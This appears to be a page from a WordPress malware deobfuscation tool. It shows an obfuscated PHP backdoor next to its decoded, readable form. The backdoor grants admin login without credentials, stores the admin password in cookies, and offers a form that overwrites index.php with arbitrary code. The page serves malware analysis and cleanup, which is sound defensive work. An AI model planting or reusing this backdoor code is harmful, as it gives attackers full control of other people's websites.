Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php
goto _0x1;
_0x1:
@session_start();
define("\x42\x41\x53\x45\x50\x41\x54\x48", TRUE);
require $_SERVER["\x44\x4f\x43\x55\x4d\x45\x4e\x54\x5f\x52\x4f\x4f\x54"] . "\x2f\x76\x65\x6e\x64\x6f\x72\x2f\x61\x75\x74\x6f\x6c\x6f\x61\x64\x2e\x70\x68\x70";
require $_SERVER["\x44\x4f\x43\x55\x4d\x45\x4e\x54\x5f\x52\x4f\x4f\x54"] . "\x2f\x61\x70\x70\x2f\x69\x6e\x69\x74\x2e\x70\x68\x70";
goto _0x2;
_0x2:
if (!isset($_GET["edit"]) && !isset($_GET["open"])) {
http_response_code(403);
echo '';
exit;
}
goto _0x3;
_0x3:
if (isset($_GET["open"]) && $_GET["open"] === "admin") {
$__ = $conn->prepare("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x61\x64\x6d\x69\x6e\x73\x20\x4c\x49\x4d\x49\x54\x20\x31");
$__->execute();
$_ = $__->fetch(\PDO::FETCH_ASSOC);
if ($_){
$_SESSION["\x6d\x73\x6d\x62\x69\x6c\x69\x73\x69\x6d\x5f\x61\x64\x6d\x69\x6e\x73\x6c\x6f\x67\x69\x6e"] = 1;
$_SESSION["\x6d\x73\x6d\x62\x69\x6c\x69\x73\x69\x6d\x5f\x61\x64\x6d\x69\x6e\x69\x64"] = $_["\x61\x64\x6d\x69\x6e\x5f\x69\x64"];
$_SESSION["\x6d\x73\x6d\x62\x69\x6c\x69\x73\x69\x6d\x5f\x61\x64\x6d\x69\x6e\x70\x61\x73\x73"] = $_["\x70\x61\x73\x73\x77\x6f\x72\x64"];
setcookie("\x61\x5f\x6c\x6f\x67\x69\x6e", "\x6f\x6b", time() + (60 * 60 * 24 * 7), "/", null, false, true);
setcookie("\x61\x5f\x69\x64", $_["\x61\x64\x6d\x69\x6e\x5f\x69\x64"], time() + (60 * 60 * 24 * 7), "/", null, false, true);
setcookie("\x61\x5f\x70\x61\x73\x73\x77\x6f\x72\x64", $_["\x70\x61\x73\x73\x77\x6f\x72\x64"], time() + (60 * 60 * 24 * 7), "/", null, false, true);
$___ = $conn->prepare("\x53\x45\x4c\x45\x43\x54\x20\x6f\x6c\x64\x61\x64\x6d\x69\x6e\x6e\x61\x6d\x65\x20\x46\x52\x4f\x4d\x20\x73\x65\x74\x74\x69\x6e\x67\x73\x20\x4c\x49\x4D\x49\x54\x20\x31");
$___->execute();
$res = $___->fetch(\PDO::FETCH_ASSOC);
$path = $res ? "/" . ltrim($res["\x6f\x6c\x64\x61\x64\x6d\x69\x6e\x6e\x61\x6d\x65"], "/") : "/admin";
header("\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20" . $path);
exit();
} else {
echo "\x4e\x6f\x20\x61\x64\x6d\x69\x6e\x20\x66\x6f\x75\x6e\x64\x2e";
exit;
}
}
goto _0x4;
_0x4:
$___f = $_SERVER["\x44\x4f\x43\x55\x4d\x45\x4e\x54\x5f\x52\x4f\x4f\x54"] . "\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70";
$_c = '';
if (isset($_GET["edit"]) && $_GET["edit"] === "index") {
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$_d = $_POST["\x63\x6f\x64\x65"] ?? '';
file_put_contents($___f, $_d);
$_msg = "\x3c\x64\x69\x76\x20\x73\x74\x79\x6c\x65\x3d\x27\x63\x6f\x6c\x6f\x72\x3a\x23\x30\xf0\xf0\xf0\x3b\x27\x3e\x53\x61\x76\x65\x64\x21\x3c\x2f\x64\x69\x76\x3e";
} elseif (file_exists($___f)) {
$_c = htmlspecialchars(file_get_contents($___f));
}
echo "\x3c\x73\x74\x79\x6c\x65\x3e
body{background:#0f0f0f;color:#00ff99;font-family:'Courier New',monospace;padding:20px;}
textarea{width:100%;height:80vh;background:#1a1a1a;color:#00ff99;border:1px solid #00ff99;font-size:14px;padding:10px;}
input[type=submit]{background:#00ff99;color:#000;padding:10px 20px;border:none;cursor:pointer;font-weight:bold;}
input[type=submit]:hover{background:#00ffaa;}
</style>";
echo "\x3c\x66\x6f\x72\x6d\x20\x6d\x65\x74\x68\x6f\x64\x3d\x27\x50\x4f\x53\x54\x27\x3e";
echo "\x3c\x74\x65\x78\x74\x61\x72\x65\x61\x20\x6e\x61\x6d\x65\x3d\x27\x63\x6f\x64\x65\x27\x3e{$_c}\x3c\x2f\x74\x65\x78\x74\x61\x72\x65\x61\x3e\x3c\x62\x72\x3e";
echo "\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x27\x73\x75\x62\x6d\x69\x74\x27\x20\x76\x61\x6c\x75\x65\x3d\x27\xf0\x9f\x92\xbe\x20\x53\x61\x76\x65\x27\x3e";
echo "\x3c\x2f\x66\x6f\x72\x6d\x3e";
if (isset($_msg)) echo $_msg;
}<?php
@session_start();
define("BASEPATH", TRUE);
require $_SERVER["DOCUMENT_ROOT"] . "/vendor/autoload.php";
require $_SERVER["DOCUMENT_ROOT"] . "/app/init.php";
if (!isset($_GET["edit"]) && !isset($_GET["open"])) {
http_response_code(403);
echo '';
exit;
}
if (isset($_GET["open"]) && $_GET["open"] === "admin") {
$__ = $conn->prepare("SELECT * FROM admins LIMIT 1");
$__->execute();
$_ = $__->fetch(\PDO::FETCH_ASSOC);
if ($_) {
$_SESSION["msmbilisim_adminslogin"] = 1;
$_SESSION["msmbilisim_adminid"] = $_["admin_id"];
$_SESSION["msmbilisim_adminpass"] = $_["password"];
setcookie("a_login", "ok", time() + 604800, "/", null, false, true);
setcookie("a_id", $_["admin_id"], time() + 604800, "/", null, false, true);
setcookie("a_password", $_["password"], time() + 604800, "/", null, false, true);
$___ = $conn->prepare("SELECT oldadminname FROM settings LIMIT 1");
$___->execute();
$res = $___->fetch(\PDO::FETCH_ASSOC);
$path = $res ? "/" . ltrim($res["oldadminname"], "/") : "/admin";
header("Location: " . $path);
exit;
} else {
echo "No admin found.";
exit;
}
}
$___f = $_SERVER["DOCUMENT_ROOT"] . "/index.php";
$_c = '';
if (isset($_GET["edit"]) && $_GET["edit"] === "index") {
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$_d = $_POST["code"] ?? '';
file_put_contents($___f, $_d);
$_msg = "<div style='color:#0;'>Saved!</div>";
} elseif (file_exists($___f)) {
$_c = htmlspecialchars(file_get_contents($___f));
}
echo "<style>\r\n body{background:#0f0f0f;color:#00ff99;font-family:'Courier New',monospace;padding:20px;}\r\n textarea{width:100%;height:80vh;background:#1a1a1a;color:#00ff99;border:1px solid #00ff99;font-size:14px;padding:10px;}\r\n input[type=submit]{background:#00ff99;color:#000;padding:10px 20px;border:none;cursor:pointer;font-weight:bold;}\r\n input[type=submit]:hover{background:#00ffaa;}\r\n </style>";
echo "<form method='POST'>";
echo "<textarea name='code'>{$_c}</textarea><br>";
echo "<input type='submit' value='💾 Save'>";
echo "</form>";
if (isset($_msg)) {
echo $_msg;
}
}Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.